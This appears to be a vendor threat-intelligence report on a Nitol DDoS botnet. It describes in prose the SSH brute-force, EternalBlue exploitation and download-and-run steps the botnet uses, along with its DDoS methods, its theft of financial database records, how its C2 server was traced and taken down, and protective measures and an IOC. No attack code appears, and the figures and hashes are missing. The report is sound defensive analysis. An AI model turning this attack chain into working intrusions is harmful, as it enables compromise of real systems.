1 Background

Recently, Huawei threat intelligence analysts discovered a large number of abnormal SSH brute force attacks, and discovered a botnet controlling a broiler size of 9000+ and identified it as a Nitol botnet through the tracking analysis of the attack tool set and the attack process. Through the binary reverse analysis and traceability forensic analysis of the botnet, the control host of the botnet is located, and the cloud service provider is contacted, and the control host of the botnet is shut down.

Nitol is one of the most active DDoS botnets. The open source code of the Nitol family have been upgraded, modified and used by foreign hackers, and Nitol already has more than 10 variants of different protocols. Although the Nitol family's botnet tools have spread to other countries, it mainly infects domestic equipment. Especially with the exposure of NSA's Eternal Blue vulnerability and the Structs2 series of vulnerabilities, the incident of bulk implanting malicious code of various families (Nitol family included) through automated exploit tool occurs.

This paper mainly introduces the spread and diffusion mode and functionality of Nitol botnet, and provides a preliminary introduction to the infrastructure and tools of the botnet.

2 Attack Mode Analysis

The Nitol botnet discovered this time not only uses the traditional brute force method, but also uses a large number of exploit tools, such as ShadowBroker, JBoss, MySql3306. The DDoS tool is delivered to the broiler after being controlled, and the broiler or broiler group is controlled to perform malicious actions. The overall attack process is as follow:

When being analyzed, the C2 address 112.73.93.251 was found to be an HFS server (Http File Server), hosting a large number of malicious files, as shown below:

In this paper, the key malicious samples hosted by HFS are used as clues to analyze construction method, functionality and infrastructure of the botnet.

2.1 Spread and Delivery

2.1.1 Brute-force

In the process of analyzing the file whgj11.exe, a large number of brute force actions were found in the sample. The following figure shows the username and password found during the reverse analysis:

Once the brute force is successful, the attacker will send the following attack commands to the broiler side: shut down the system firewall, download the DDoS tool through the wget command, execute the downloaded file, and set the Linux boot entry.

2.1.2 Vulnerability Exploitation

In the process of analyzing whgj11.exe, we found not only the brute force action, but also an attack against target’s 139 and 445 ports by exploiting Eternal Blue + DoublePulsar vulnerabilities. Once the attack is successful, the DDoS attack tool will be downloaded.

The following figure shows the exploiting propagation traffic sent during the running of whgj11.exe:

The traffic is analyzed using PassiveTotal, and an attack exploiting Eternal Blue + DoublePulsar vulnerabilities was found.

Other exploit tools are also hosted on the C2 server, as shown in the following table:

Once the exploit is successful, the program will propagate and call the DLL file to download the DDoS tool.

2.2 DDoS Attack

During the analysis of Linuxwhgj, up to 14 DDoS attack methods were discovered, and we found that different DDoS attacks were performed according to different parameters.

The attack parameter correspondence table is as follow:

2.3 Steal Data

In the process of analyzing the malicious sample whgj.exe, not only the remote control action, but also a large number of MySQL database operations were found, as shown in the following figure:

As can be seen in the figure, there are sales and accounting related keywords, such as BILLID, SALEBILL, SALEDETAIL, PAYDETAIL, suspected of being used to steal corporate financial information.

3 Traceability Analysis

3.1 Sample Behavior Association

During the analysis of whgj11.exe, it was found that whgj11.exe was similar to the sample used by the Nitol Group botnet after unpacked. The following figure is a code logic comparison between the sample we found this time and a known Nitol botnet sample:

By comparison, it can be inferred that the botnet discovered this time is a branch of the Nitol botnet, which is why this paper is so named.

3.2 C2 Server

In the process of sample analysis, the C2 address can be confirmed as 112.73.93.25, which has not been included in any information platform (before 15:00, August 22, 2018). By querying the Whois, it can be determined that this IP is from Eflycloud.

At present, Eflycloud's recharge methods include Alipay, WeChat, online banking and offline payment, based on which an attacker can be targeted.

In addition, users of Eflycloud need to provide mobile phone number and mailbox information during the registration process, which provides another way to target attacker.

The customer service staff of Eflycloud has already been contacted, and the C2 server has been shut down and is currently inaccessible.

3.3 Tool set

The attacker concerned used a large number of exploit tools and remote control tools, as shown in the following table.

4 Analysis Conclusion

The analysis of this botnet is summarized as follows:

1.Common botnet controllers will deploy C2 service and file download service on different nodes, but the C2 service and file download service found this time are hosted on the same node (112.73.93.251);

2.The tools used by the botnet controller have been exposed to the network and can be downloaded and used directly. After downloading and analyzing, we find them to be common remote control tools;

3.Common botnet controllers hide C2 and registration information by methods such as purchasing domain name service, DGA algorithm. But the C2 service found in this paper is hosted by domestic cloud service provider.

Based on the above analysis, the following is inferred:

1.The botnet is launched by individual or small-scale group without rich experience, the tools used by the botnet are common remote control tools is an example;

2.The true identity of the botnet controller can be obtained through the registration information of the domestic cloud service provider. The botnet controller quickly builds a botnet for testing through a domestic cloud service provider, without too much consideration for the privacy of the botnet itself.

5 Protective Measures

1.Block C2 according to the IOC information provided in the appendix and block malicious samples from entering the enterprise;

2.Install vendor-supplied patch to fix the vulnerability or upgrade the software to the latest non-vulnerable version;

3.If you find a suspected malicious sample, you can submit it to Huawei Cloud Sandbox for detection and make a quick decision based on the detection result;

4.It is recommended to deploy IPS-enabled device to protect against various exploits.

Appendix: IOC

C2：112.73.93.251

HASH：